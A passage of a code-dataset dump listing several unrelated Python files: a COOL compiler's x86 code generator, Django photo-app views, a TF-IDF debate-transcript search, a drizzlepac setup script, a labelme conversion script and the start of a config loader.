isLvalue)\n elif isinstance(expr, Let):\n return self.code_genLet(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, ParenExpr):\n return self.code_genExpr(c, method, num_locals, expr.e, isLvalue)\n elif isinstance(expr, NewConstruct):\n return self.code_genNew(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Neg):\n return self.code_genNeg(c, method, num_locals, expr, isLvalue)\n\n def code_genNeg(self, c, method, num_locals, expr, isLvalue):\n expr_code, expr_type = self.code_genExpr(c, method, num_locals, expr.expr, isLvalue)\n\n return expr_code + TAB + \"negq %rax\" + NEWLINE, expr_type\n\n def code_genNew(self, c, method, num_locals, newExpr, isLvalue):\n object_name = newExpr.objType\n\n ret = TAB + \"leaq {}_protoObj(%rip), %rdi\".format(object_name) + NEWLINE\n ret += self.genFuncCall(\"Object_copy\") + NEWLINE\n ret += TAB + \"movq %rax, %rdi\" + NEWLINE\n ret += TAB + \"pushq %rax\" + NEWLINE\n ret += TAB + \"subq $8, %rsp\" + NEWLINE\n ret += self.genFuncCall(\"{}_init\".format(object_name)) + NEWLINE\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n ret += TAB + \"popq %rax\" + NEWLINE\n\n return ret, object_name\n\n def code_genLet(self, c, method, num_locals, letExpr, isLvalue):\n\n self.scope.enterScope()\n decl_num = len(letExpr.declareVars)\n\n # save space on the stack for let varaibles\n stack_size = align(decl_num * self.wordsize, ALIGNMENT_SIZE)\n ret = TAB + \"subq ${}, %rsp\".format(stack_size) + NEWLINE\n\n for i, varDecl in enumerate(letExpr.declareVars):\n id = varDecl.id\n offset = -(i + num_locals + 5) * self.wordsize\n self.scope.addId(id, offset, varDecl.decType)\n\n if varDecl.init:\n init, _ = self.code_genExpr(c, method, num_locals + decl_num, varDecl.init, True)\n else:\n init = self.code_genInitValue(varDecl.decType)\n \n ret += init\n ret += TAB + \"movq %rax, {}(%rbp)\".format(offset) + NEWLINE\n\n body, body_type = self.code_genExpr(c, method, num_locals + decl_num, letExpr.bodyExpr, isLvalue)\n\n ret += body\n self.scope.existScope()\n\n return ret, body_type \n\n def code_genBlock(self, c, method, num_locals, block, isLvalue):\n\n codes = []\n for i in range(len(block.exprs) - 1):\n ret, _ = self.code_genExpr(c, method, num_locals, block.exprs[i], isLvalue)\n codes.append(ret)\n \n last_code, ty = self.code_genExpr(c, method, num_locals, block.exprs[-1], isLvalue)\n codes.append(last_code)\n\n return NEWLINE.join(codes), ty\n\n def code_genSelf(self, c, method, num_locals, selfExpr, isLvalue):\n return TAB + \"movq {}(%rbp), %rax\".format(STACK_SELF_OFFST) + NEWLINE, 'Self'\n \n def code_genId(self, c, method, num_locals, idExpr, isLvalue):\n\n ret = \"\"\n ty = None\n\n offset = self.scope.lookup_offset(idExpr.id)\n if offset:\n ty = self.scope.lookup_type(idExpr.id)\n ret += TAB + \"movq {}(%rbp), %rax\".format(offset) + NEWLINE\n\n # id is an instance variable\n if idExpr.id in self.attrtable[c.className]:\n object_addr_offset = self.scope.lookup_offset('self')\n object_attr_offset = self.attrtable[c.className][idExpr.id]['offset']\n object_attr_type = self.attrtable[c.className][idExpr.id]['type']\n ty = object_attr_type\n\n ret = TAB + \"movq {}(%rbp), %rax\".format(object_addr_offset) + NEWLINE\n ret += TAB + \"movq {}(%rax), %rax\".format(object_attr_offset) + NEWLINE\n\n if self.scope.lookup_type(idExpr.id) == 'Int' or self.attrtable[c.className][idExpr.id]['type'] == 'Int':\n if not isLvalue:\n ret += TAB + \"movq {}(%rax), %rax\".format(INTCONST_VALOFFSET) + NEWLINE\n\n return ret, ty\n\n exit(\"{} not in params_offset\").format(idExpr.id)\n\n def code_genNot(self, c, method, num_locals, expr, isLvalue):\n if isinstance(expr, GreaterThan):\n return code_genExpr(self, c, method, num_locals, LessEq(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, GreaterEq):\n return code_genExpr(self, c, method, num_locals, LessThan(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, Eq):\n return code_genExpr(self, c, method, num_locals, NotEq(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, NotEq):\n return code_genExpr(self, c, method, num_locals, Eq(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, LessThan):\n return code_genExpr(self, c, method, num_locals, GreaterEq(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, LessEq):\n return code_genExpr(self, c, method, num_locals, GreaterThan(expr.e1, expr.e2), isLvalue)\n else:\n exit(\"this should not happend - code genNode\")\n \n def code_genBinaryArith(self, c, method, num_locals, expr, isLvalue):\n if isinstance(expr, Plus):\n op = \"addq\"\n elif isinstance(expr, Minus):\n op = \"subq\"\n elif isinstance(expr, Multiply):\n op = \"imulq\"\n elif isinstance(expr, Divide):\n op = \"idivq\"\n\n e1, ty1 = self.code_genExpr(c, method, num_locals, expr.e1, False)\n e2, ty2 = self.code_genExpr(c, method, num_locals, expr.e2, False)\n\n\n\n ret = e1 + NEWLINE\n ret += TAB + \"push %rax\" + NEWLINE\n ret += e2 + NEWLINE\n ret += TAB + \"movq %rax, %rdi\" + NEWLINE #e2 : rdi\n ret += TAB + \"popq %rax\" + NEWLINE #e1 : rax\n if op == \"idivq\":\n ret += TAB + \"xorq %rdx, %rdx\" + NEWLINE\n ret += TAB + \"idivq %rdi\" + NEWLINE\n else:\n ret += TAB + \"{} %rdi, %rax\".format(op) + NEWLINE\n\n ret += TAB + \"movq %rax, %rdi\" + NEWLINE\n ret += TAB + \"pushq %rdi\" + NEWLINE\n ret += TAB + \"subq $8, %rsp\" + NEWLINE\n\n newcode, _ = self.code_genNew(c, method, num_locals, NewConstruct(\"Int\"), isLvalue)\n ret += newcode + NEWLINE\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n ret += TAB + \"popq %rdi\" + NEWLINE\n ret += TAB + \"movq %rdi, {}(%rax)\".format(INTCONST_VALOFFSET) + NEWLINE\n\n return ret, 'Int'\n\n def code_genBinary(self, c, method, num_locals, expr, isLvalue):\n\n if isinstance(expr, (Plus, Minus, Multiply, Divide)):\n return self.code_genBinaryArith(c, method, num_locals, expr, isLvalue)\n \n # condition\n if isinstance(expr, GreaterThan):\n e = \"g\"\n elif isinstance(expr, GreaterEq):\n e = \"ge\"\n elif isinstance(expr, Eq):\n e = \"e\"\n elif isinstance(expr, LessThan):\n e = \"l\"\n elif isinstance(expr, LessEq):\n e = \"le\"\n elif isinstance(expr, NotEq):\n e = \"ne\"\n\n e1, _ = self.code_genExpr(c, method, num_locals, expr.e1, False)\n e2, _ = self.code_genExpr(c, method, num_locals, expr.e2, False)\n\n \n\n ret = e1\n ret += TAB + \"pushq %rax\" + NEWLINE\n ret += e2\n ret += TAB + \"popq %rdi\" + NEWLINE\n ret += TAB + \"cmpq %rax, %rdi\" + NEWLINE\n ret += TAB + \"set{} %al\".format(e) + NEWLINE\n ret += TAB + \"movzbq %al, %rax\" + NEWLINE\n\n return ret, 'Bool'\n\n def code_genWhile(self, c, method, num_locals, whileExpr, isLvalue):\n\n seqNum = self.genSeqNum()\n\n begin_label = c.className + \".\" + method.methodName + \".loop_start.\" + str(seqNum)\n end_label = c.className + \".\" + method.methodName + \".loop_end.\" + str(seqNum)\n\n cnd, _ = self.code_genExpr(c, method, num_locals, whileExpr.condition, False)\n body, _ = self.code_genExpr(c, method, num_locals, whileExpr.bodyExpr, isLvalue)\n\n ret = begin_label + COLON + NEWLINE\n ret += cnd + NEWLINE\n ret += TAB + \"cmpq $1, %rax\" + NEWLINE\n ret += TAB + \"jne {}\".format(end_label) + NEWLINE\n ret += body + NEWLINE\n ret += TAB + \"jmp {}\".format(begin_label) + NEWLINE\n\n ret += end_label + COLON + NEWLINE\n\n return ret, 'Object'\n \n \n def code_genIf(self, c, method, num_locals, ifExpr, isLvalue):\n\n seqNum = self.genCondSeq()\n els_label = c.className + \".\" + method.methodName + \".else.\" + str(seqNum)\n end_label = c.className + \".\" + method.methodName + \".end.\" + str(seqNum)\n\n cnd, _ = self.code_genExpr(c, method, num_locals, ifExpr.cnd, isLvalue)\n thn, _ = self.code_genExpr(c, method, num_locals, ifExpr.thn, True)\n els, _ = self.code_genExpr(c, method, num_locals, ifExpr.els, True)\n\n ret = TAB + \"cmpq $1, %rax\" + NEWLINE\n ret += TAB + \"jne {}\".format(els_label) + NEWLINE\n ret += thn + NEWLINE\n ret += TAB + \"jmp {}\".format(end_label) + NEWLINE\n ret += NEWLINE\n ret += els_label + COLON + NEWLINE\n ret += els + NEWLINE\n ret += end_label + COLON + NEWLINE\n\n return cnd + ret, _\n\n def code_genBoolean(self, c, method, num_locals, booleanExpr, isLvalue):\n if booleanExpr.bval:\n return TAB + \"movq $1, %rax\" + NEWLINE, 'Bool'\n \n return TAB + \"movq $0, %rax\" + NEWLINE, 'Bool'\n\n def code_genString(self, c, method, num_locals, stringExpr, isLvalue):\n\n if stringExpr.sval in self.stringtable:\n string_lab = self.stringtable[stringExpr.sval]['label']\n else:\n seq = self.genSeqNum()\n string_lab = \"string_const\" + str(seq)\n string_content_lab = \"string_content\" + str(seq)\n self.stringtable[stringExpr.sval] = {}\n self.stringtable[stringExpr.sval]['content'] = string_content_lab\n self.stringtable[stringExpr.sval]['label'] = string_lab\n self.str_contenttable[string_content_lab] = stringExpr.sval\n\n if not str(len(stringExpr.sval)) in self.inttable:\n int_lab = \"int_const\" + str(seq)\n self.inttable[str(len(stringExpr.sval))] = int_lab\n\n\n\n \n ret = TAB + \"leaq {}(%rip), %rax\".format(string_lab) + NEWLINE\n\n if isLvalue:\n return ret, 'String'\n\n # # the actual string is located at offset 32, the fifth field\n ret += TAB + \"movq {}(%rax), %rax\".format(STRCONST_STROFFSET) + NEWLINE\n\n return ret, 'String'\n\n def code_genInteger(self, c, method, num_locals, intExpr, isLvalue):\n if str(intExpr.ival) in self.inttable:\n int_label = self.inttable[str(intExpr.ival)]\n else:\n seq = self.genSeqNum()\n int_label = \"int_const\" + str(seq)\n self.inttable[str(intExpr.ival)] = int_label\n\n # get constant object address, then get content at offset\n ret = TAB + \"leaq {}(%rip), %rax\".format(int_label) + NEWLINE\n\n if isLvalue:\n return ret, 'Int'\n\n ret += TAB + \"movq {}(%rax), %rax\".format(INTCONST_VALOFFSET) + NEWLINE\n\n return ret, 'Int'\n\n def code_genDispatch(self, c: 'Class', method, num_locals, dispatchExpr, isLvalue):\n ret = \"\"\n\n obj_code, obj_ty = self.code_genExpr(c, method, num_locals, dispatchExpr.objExpr, True)\n ret += obj_code\n ret += TAB + \"push %rdi\" + NEWLINE\n ret += TAB + \"subq $8, %rsp\" + NEWLINE\n ret += TAB + \"movq %rax, %rdi\" + NEWLINE\n\n methodName = dispatchExpr.methodName\n arg_len = len(dispatchExpr.arguments)\n\n # rdi might be used in code_gen for arguments, so we need to push it again\n ret += TAB + \"push %rdi\" + NEWLINE\n ret += TAB + \"subq $8, %rsp\" + NEWLINE\n \n stack_count = 0\n for i, arg in reversed(list(enumerate(dispatchExpr.arguments))):\n arg_code, _ = self.code_genExpr(c, method, num_locals, arg, True)\n\n # ret += self.caller_save_push()\n ret += arg_code\n # ret += self.caller_save_pop()\n\n if i < 5: \n # first reg is saved for object (could be SELF or other type)\n ret += TAB + \"movq %rax, {}\".format(self.param_regs[i + 1]) + NEWLINE\n else:\n ret += TAB + \"pushq %rax\" + NEWLINE\n stack_count += 1\n \n\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n ret += TAB + \"popq %rdi\" + NEWLINE\n ret += TAB + \"movq {}(%rdi), {}\".format(DISP_OFFSET, DISP_FUNC_REG) + NEWLINE\n\n # get the function offset from dispatch table\n if obj_ty == 'Self': obj_ty = c.className\n offset = self.dispatchTable[obj_ty][methodName]['offset']\n \n # use offset to get the appropriate function\n ret += TAB + \"movq {}({}), {}\".format(str(offset), DISP_FUNC_REG, DISP_FUNC_REG) + NEWLINE\n ret += self.genFuncCall('*' + DISP_FUNC_REG)\n\n while stack_count > 0:\n ret += TAB + \"popq %rax\" + NEWLINE\n stack_count -= 1\n\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n ret += TAB + \"popq %rdi\" + NEWLINE\n\n ret_type = str(self.type_scope.lookup(c.className).lookupType(method.methodName).ret_ty)\n\n if not isLvalue and ret_type == 'Int':\n ret += TAB + \"movq {}(%rax), %rax\".format(INTCONST_VALOFFSET) + NEWLINE\n\n\n return ret, ret_type\n\n def code_genAssignment(self, c: 'Class', method, num_locals, assignExpr, isLvalue):\n ret = \"\"\n\n lhs = assignExpr.id\n rhs_code, rhs_ty = self.code_genExpr(c, method, num_locals, assignExpr.expr, True)\n\n ret += rhs_code\n\n # if it is in scope\n offset = self.scope.lookup_offset(lhs)\n if offset:\n ret += TAB + \"movq %rax, {}(%rbp)\".format(offset) + NEWLINE\n return ret, rhs_ty\n\n if lhs in self.attrtable[c.className]:\n attr_offset = self.attrtable[c.className][lhs]['offset']\n\n # -40 is the offset to access self obj\n ret += TAB + \"movq {}(%rbp), {}\".format(STACK_SELF_OFFST, OBJ_ADDR_REG) + NEWLINE\n ret += TAB + \"movq %rax, {}({})\".format(attr_offset, OBJ_ADDR_REG) + NEWLINE\n\n return ret, rhs_ty\n\n def gen_selfObjAddress(self):\n return TAB + \"movq {}(%rbp), {}\".format(OBJ_ADDR_REG) + NEWLINE\n\n def genMethodEntry(self):\n ret = TAB + \"pushq %rbp\" + NEWLINE + TAB + \"movq %rsp, %rbp\" + NEWLINE\n for reg in self.callee_save:\n ret += TAB + \"pushq {}\".format(reg) + NEWLINE\n return ret\n\n def genMethodExit(self):\n ret = \"\"\n for reg in list(reversed(self.callee_save)):\n ret += TAB + \"popq {}\".format(reg) + NEWLINE\n\n return ret + TAB + \"leave\" + NEWLINE + TAB + \"ret\" + NEWLINE\n\n def genFuncCall(self, name):\n ret = \"\"\n\n ret += self.caller_save_push()\n \n ret += TAB + \"callq {}\".format(name) + NEWLINE\n\n ret += self.caller_save_pop()\n\n return ret\n\n def caller_save_push(self):\n ret = \"\"\n\n for reg in self.caller_save:\n ret += TAB + \"pushq {}\".format(reg) + NEWLINE\n\n \n # there are 7 caller save regs, so we need 8 more bytes to \n # make sure that the stack is 16 bytes aligned\n ret += TAB + \"subq $8, %rsp\" + NEWLINE\n\n return ret\n\n def caller_save_pop(self):\n\n ret = \"\"\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n\n\n for reg in list(reversed(self.caller_save)):\n ret += TAB + \"popq {}\".format(reg) + NEWLINE\n\n return ret\n\n\n\n \n\nif __name__ == \"__main__\":\n \n import sys\n import os\n import glob\n from parser import make_parser\n from os.path import basename\n import subprocess\n\n root_path = '/Users/Jack/Documents/programming/python/coolCompiler'\n test_folder = root_path + '/Tests'\n\n parser = make_parser()\n\n # filename = sys.argv[1]\n filename = \"Tests/palindrome.cl\"\n\n with open(filename) as f:\n cool_program_code = f.read()\n\n parse_result = parser.parse(cool_program_code)\n type_scope = parse_result.typecheck()\n cgen = CGen(parse_result, type_scope)\n code = cgen.code_gen()\n\n assembly_name = os.path.splitext(basename(filename))[0] \n with open(\"x86/\" + assembly_name + \".s\", 'w') as f:\n print(\"writing into file {}.s\".format(assembly_name))\n f.write(code)\n\n\n print(subprocess.check_output(\n [\n \"clang\", \n \"runtime/runtime.c\", \n \"runtime/startup.s\", \n \"x86/{}.s\".format(assembly_name),\n \"-o\",\n \"bin/{}\".format(assembly_name)\n\n ]))\n\n ","sub_path":"src/cool_codegen.py","file_name":"cool_codegen.py","file_ext":"py","file_size_in_byte":35098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"538912573","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .forms import NewpostForm,NewProfileForm\nfrom .models import Image,Profile\nfrom django.http import HttpResponse\n\n\n@login_required(login_url='/accounts/login/')\ndef welcome(request):\n images=Image.objects.all()\n return render(request,'welcome.html',{ 'images':images})\n\n@login_required(login_url='/accounts/login/')\ndef new_post(request):\n current_user = request.user\n if request.method == 'POST':\n form = NewpostForm(request.POST, request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.user = current_user\n \n image.save()\n return redirect('welcome')\n\n else:\n form = NewpostForm()\n return render(request, 'new_post.html', {\"form\": form})\n@login_required(login_url='/accounts/login/')\ndef addprofile(request):\n current_user = request.user\n if request.method == 'POST':\n form = NewProfileForm(request.POST, request.FILES)\n if form.is_valid():\n profile = form.save(commit=False)\n profile.user = current_user\n \n profile.save()\n return redirect('viewprofile')\n\n else:\n form = NewProfileForm\n return render(request, 'profile.html', {\"form\": form})\n@login_required(login_url='/accounts/login/')\ndef viewprofile(request):\n current_user = request.user\n profile = Profile.objects.filter(user = current_user).first()\n return render(request,'viewprofile.html',{'profile':profile})\n# def search_results(request):\n\n# if 'user' in request.GET and request.GET[\"user\"]:\n# search_term = request.GET.get(\"user\")\n# user = User.search_by_username(search_term)\n# message = f\"{search_term}\"\n\n# return render(request, 'all_photos/search.html',{\"message\":message,\"image\":images})\n\n# else:\n# message = \"You haven't searched for any term\"\n# return render(request, 'all_photos/search.html',{\"message\":message})\ndef search_results(request):\n\n if 'user' in request.GET and request.GET[\"user\"]:\n search_term = request.GET.get(\"user\")\n searched_users = Image.search_by_user(search_term)\n message = f\"{search_term}\"\n\n return render(request, 'all-photos/search.html',{\"message\":message,\"users\": searched_users})\n\n else:\n message = \"You haven't searched for any term\"\n return render(request, 'all-photos/search.html',{\"message\":message})","sub_path":"instagram/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"142437428","text":"import pandas as pd\nimport re\nimport numpy as np\nimport math\nfrom app.irsystem.models.BingImageSearchv7 import image_search\n\ndef tokenize(text):\n text = text.lower()\n return re.findall(\"[a-z]+\", text)\n\ndocs = []\ndata = pd.read_csv('app/data/debate_transcripts_v5.csv')\nfor i in range(0, len(data['speech'])):\n docs.append(dict())\n docs[i]['speaker'] = data['speaker'][i]\n docs[i]['text'] = tokenize(data['speech'][i])\n\ndef build_inverted_index(msgs):\n result = dict()\n for i in range(0, len(msgs)):\n for word in msgs[i]['text']:\n if word in result:\n if i in result[word]:\n result[word][i] += 1\n else:\n result[word][i] = 1\n else:\n result[word] = dict()\n result[word][i] = 1\n tups = dict()\n for i in result:\n tups[i] = []\n for key in result[i]:\n tups[i].append((key, result[i][key]))\n return tups\n\ninv_idx = build_inverted_index(docs)\n\ndef compute_idf(inv_idx, n_docs, min_df=100, max_df_ratio=0.3):\n result = dict()\n max_df = n_docs * max_df_ratio\n for i in inv_idx:\n if len(inv_idx[i]) >= min_df and len(inv_idx[i]) <= max_df:\n result[i] = math.log(n_docs / (1 + len(inv_idx[i])), 2)\n \n return result\n\nidf = compute_idf(inv_idx, len(data['speech']))\n\ndef compute_doc_norms(index, idf, n_docs):\n norms = np.zeros(n_docs)\n for i in index:\n if i in idf:\n for j in range(0, len(index[i])):\n norms[index[i][j][0]] += (index[i][j][1] * idf[i])**2\n for i in range(0, len(norms)):\n norms[i] = norms[i]**.5\n return norms\n\n\n\ninv_idx = {key: val for key, val in inv_idx.items()\n if key in idf} \n\ndoc_norms = compute_doc_norms(inv_idx, idf, len(data['speech']))\n\n\ndef index_search(q, index, idf, doc_norms, tokenizer=tokenize): \n #q = tokenizer(query.lower())\n q_words = dict()\n for i in q:\n if i in q_words:\n q_words[i] += 1\n else:\n q_words[i] = 1\n q_norm = 0\n for i in q_words:\n if i in idf:\n q_norm += (q_words[i] * idf[i])**2\n q_norm = q_norm**.5\n \n scores = dict()\n for word in q:\n if word in idf:\n for doc in index[word]:\n if doc[0] in scores:\n scores[doc[0]] += q_words[word] * idf[word] * doc[1] * idf[word]\n else:\n scores[doc[0]] = q_words[word] * idf[word] * doc[1] * idf[word]\n result = []\n for i in scores:\n result.append((scores[i] / (q_norm * doc_norms[i]), i))\n \n results = sorted(result, reverse = True)\n \n \n return results\n\ndef sim_list(doc_id): #produces 5 most similar docs to doc_id\n sim_list = index_search(docs[doc_id]['text'], inv_idx, idf, doc_norms)\n result = []\n for i in range(0, 5):\n result.append(sim_list[i][1])\n return result\n\ndef get_3_sim_cosine(str):\n q = tokenize(str.lower())\n final_data = []\n sim_list = index_search(q, inv_idx, idf, doc_norms)\n for i in range(1, 4):\n idx = sim_list[i][1]\n obj = {\"score\": sim_list[i][0], \"debate_name\": data['debate_name'][idx], \"debate_date\": data['debate_date'][idx], \"speaker\":data['speaker'][idx], \"speech\":data['speech'][idx], \"link\": data[\"transcript_link\"][idx] }\n final_data.append(obj)\n return final_data\n\ndef get_top_n(query, n, politicians):\n #query: query string\n #n: number (int) of desired results\n #politicians: string\n \n check_pol = True\n if n:\n n=int(n)\n else:\n n=10\n\n if not politicians and not query:\n return\n\n if not query:\n return\n\n if not politicians:\n check_pol = False\n else:\n politicians = [p.strip() for p in politicians.split(\",\")]\n input_politicians = []\n for politician in politicians:\n item = politician.split()\n word = \"\"\n for name in item:\n word += name.capitalize() + \" \"\n input_politicians.append(word.strip())\n input_politicians = set(input_politicians)\n # print(input_politicians)\n\n q = tokenize(query)\n\n sim_list = index_search(q, inv_idx, idf, doc_norms)\n count = 0\n i = 0\n final_data = []\n while count < n and i < len(sim_list):\n idx = sim_list[i][1]\n if(check_pol):\n if data['speaker'][idx] in input_politicians:\n obj = {\"score\": sim_list[i][0], \"debate_name\": data['debate_name'][idx], \"debate_date\": data['debate_date'][idx], \"speaker\":data['speaker'][idx], \"speech\":data['speech'][idx], \"link\": data[\"transcript_link\"][idx], \"image\":image_search(data['speaker'][idx])}\n final_data.append(obj)\n count += 1\n else:\n obj = {\"score\": sim_list[i][0], \"debate_name\": data['debate_name'][idx], \"debate_date\": data['debate_date'][idx], \"speaker\":data['speaker'][idx], \"speech\":data['speech'][idx], \"link\": data[\"transcript_link\"][idx], \"image\":image_search(data['speaker'][idx]) }\n final_data.append(obj)\n count += 1\n i += 1\n return final_data","sub_path":"app/irsystem/models/cosine_sim.py","file_name":"cosine_sim.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"352075645","text":"\"\"\"\nVarious checking\n\"\"\"\nimport os\n\ndef check():\n \"\"\"\n checks difflibjs is present\n \"\"\"\n path = os.path.abspath(os.path.dirname(__file__))\n fold = os.path.join(path, \"temp_difflibjs\")\n r = os.path.exists(fold)\n if not r : return r\n f = os.path.join(fold, \"jsdifflib.zip\")\n r = os.path.exists(f)\n if not r : return r\n size = os.stat(f).st_size\n return size > 0\n \n","sub_path":"src/pyquickhelper/sync/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389888177","text":"from __future__ import print_function\n\nfrom distutils.core import Extension\nimport sys, os.path, os\nfrom distutils import sysconfig\n\n# BUILD should be 'debug', 'profile' or 'release'\nBUILD = 'release'\n\ntry:\n import numpy\nexcept ImportError:\n print(\"Numpy was not found. It may not be installed or it may not be on your PYTHONPATH. Multidrizzle requires numpy v 1.0.2 or later.\\n\")\n raise\n\n# This is the case for building as part of stsci_python\nif os.path.exists('pywcs'):\n # use the not-installed-yet source tree for pywcs\n pywcsincludes = [os.path.join('pywcs', 'src')]\n candidates = []\n for path in os.listdir('pywcs'):\n if path.startswith('wcslib'):\n candidates.append(path)\n if len(candidates) == 1:\n pywcsincludes.append(os.path.join('pywcs', candidates[0], 'C'))\n else:\n raise SystemExit(\"No suitable version of wcslib found in the current distribution of pywcs\")\nelse:\n try:\n from astropy import wcs as pywcs\n pywcslib = pywcs.__path__[0]\n pywcsincludes = [os.path.join(pywcslib, 'include'),\n os.path.join(pywcslib, 'include', 'wcslib')]\n except ImportError:\n raise ImportError(\"PyWCS was not found. It may not be installed or it may not be on your PYTHONPATH. \\nPydrizzle requires pywcs 1.4 or later.\\n\")\n\nif numpy.__version__ < \"1.0.2\":\n raise SystemExit(\"Numpy 1.0.2 or later required to build Multidrizzle.\")\n\nprint(\"Building C extensions using NUMPY.\")\n\nnumpyinc = numpy.get_include()\n\npythonlib = sysconfig.get_python_lib(plat_specific=1)\npythoninc = sysconfig.get_python_inc()\nver = sysconfig.get_python_version()\npythonver = 'python' + ver\n\nif sys.platform != 'win32':\n EXTRA_LINK_ARGS = []\nelse:\n EXTRA_LINK_ARGS = ['/NODEFAULTLIB:MSVCRT' ] # , pywcslib+'/_pywcs.dll']\n EXTRA_LINK_ARGS = []\n\n\ndef getNumpyExtensions():\n define_macros = [('PYDRIZZLE', None)]\n undef_macros = []\n EXTRA_COMPILE_ARGS = []\n if BUILD.lower() == 'debug':\n define_macros.append(('DEBUG', None))\n undef_macros.append('NDEBUG')\n if not sys.platform.startswith('sun') and \\\n not sys.platform == 'win32':\n EXTRA_COMPILE_ARGS.extend([\"-fno-inline\", \"-O0\", \"-g\"])\n elif BUILD.lower() == 'profile':\n define_macros.append(('NDEBUG', None))\n undef_macros.append('DEBUG')\n if not sys.platform.startswith('sun') and \\\n not sys.platform == 'win32':\n EXTRA_COMPILE_ARGS.extend([\"-O3\", \"-g\"])\n elif BUILD.lower() == 'release':\n # Define ECHO as nothing to prevent spurious newlines from\n # printing within the libwcs parser\n define_macros.append(('NDEBUG', None))\n undef_macros.append('DEBUG')\n else:\n raise ValueError(\"BUILD should be one of 'debug', 'profile', or 'release'\")\n\n\n ext = [Extension(\"drizzlepac.cdriz\",['src/arrdrizmodule.c',\n 'src/cdrizzleblot.c',\n 'src/cdrizzlebox.c',\n 'src/cdrizzleio.c',\n 'src/cdrizzlemap.c',\n 'src/cdrizzleutil.c',\n 'src/cdrizzlewcs.c'],\n define_macros=define_macros,\n undef_macros=undef_macros,\n include_dirs=[pythoninc] + [numpyinc] + \\\n pywcsincludes,\n extra_link_args=EXTRA_LINK_ARGS,\n extra_compile_args=EXTRA_COMPILE_ARGS,\n # not needed on windows; not needed on mac\n # libraries=['m']\n )]\n\n return ext\n\n\npkg = \"drizzlepac\"\n\nsetupargs = {\n\n 'version' : '1.1.1dev',\n 'description' : \"C-based MultiDrizzle\",\n 'author' : \"Megan Sosey, Warren Hack, Christopher Hanley, Chris Sontag, Mihai Cara\",\n 'author_email' : \"help@stsci.edu\",\n 'license' : \"http://www.stsci.edu/resources/software_hardware/pyraf/LICENSE\",\n 'platforms' : [\"Linux\",\"Solaris\",\"Mac OS X\",\"Win\"],\n 'data_files' : [( pkg+\"/pars\", ['lib/drizzlepac/pars/*']),\n ( pkg+\"/htmlhelp/_images/math\", ['lib/drizzlepac/htmlhelp/_images/math/*']),\n ( pkg+\"/htmlhelp/_images\", ['lib/drizzlepac/htmlhelp/_images/*.*']),\n ( pkg+\"/htmlhelp/_sources\", ['lib/drizzlepac/htmlhelp/_sources/*']),\n ( pkg+\"/htmlhelp/_static\", ['lib/drizzlepac/htmlhelp/_static/*']),\n ( pkg+\"/htmlhelp\", ['lib/drizzlepac/htmlhelp/*.html']),\n ( pkg, ['lib/drizzlepac/*.help'])],\n 'scripts' : [\"scripts/mdriz\",\"scripts/resetbits\",\"scripts/updatenpol\",\"scripts/runastrodriz\"] ,\n 'ext_modules' : getNumpyExtensions(),\n 'package_dir' : { 'drizzlepac' : 'lib/drizzlepac', },\n\n }\n\n","sub_path":"defsetup.py","file_name":"defsetup.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313523167","text":"import labelme\nimport os, sys\n\n\n\n\nif __name__ == \"__main__\":\n mode = 'val'\n kind = 'U100'\n path=f\"/home/rico-li/Job/豐興鋼鐵/data/clean_data_20frames/{kind}/images/{mode}\"\n dest = f\"/home/rico-li/Job/豐興鋼鐵/data/clean_data_20frames/{kind}/annotations/{mode}\"\n dirs = os.listdir(path)\n dirs = [dir for dir in dirs if dir.endswith('.json')]\n dirs = [os.path.join(path,dir) for dir in dirs]\n \n\n for i, item in enumerate(dirs):\n json_name = item.split('/')[-1].split('.')[0]\n os.system(\"labelme_json_to_dataset \"+item+\" --save \"+dest)","sub_path":"json_to_dataset.py","file_name":"json_to_dataset.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644812814","text":"import os, sys\r\nimport json\r\n\r\nclass config():\r\n\t\r\n\tdef __init__(self):\r\n\t\t\r\n\t\tself.debugEnabled = False\r\n\t\tself.params = {}\r\n\t\tself.configured = False\r\n\t\r\n\tdef param(self, *args):\r\n\t\ttry:\r\n\t\t\tif len(args) == 1:\r\n\t\t\t\tif args[0] in self.params:\r\n\t\t\t\t\treturn self.params[args[0]]\r\n\t\t\tif len(args) == 2:\r\n\t\t\t\tif args[0] in self.params:\r\n\t\t\t\t\tif args[1] in self.params[args[0]]:\r\n\t\t\t\t\t\treturn self.params[args[0]][args[1]]\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\treturn None\r\n\r\n\t# load json config file from supplied commandline\r\n\t# argument or from default config file name with\r\n\t# format of {app_path}/{app_base_name}.cfg\r\n\tdef load(self, configFile=None):\r\n\t\t\r\n\t\t# TODO account for a configFile being\r\n\t\t# passed in\r\n\t\t\r\n\t\t# default to commandline arguments if a\r\n\t\t# filename is not supplied\r\n\t\tif configFile == None:\r\n\t\t\tpass\r\n\t\t\t\r\n\t\t# calculate application base name and real application path\r\n\t\t# uses system argument which is present regardless of\r\n\t\t# supplied arguments\r\n\t\te = 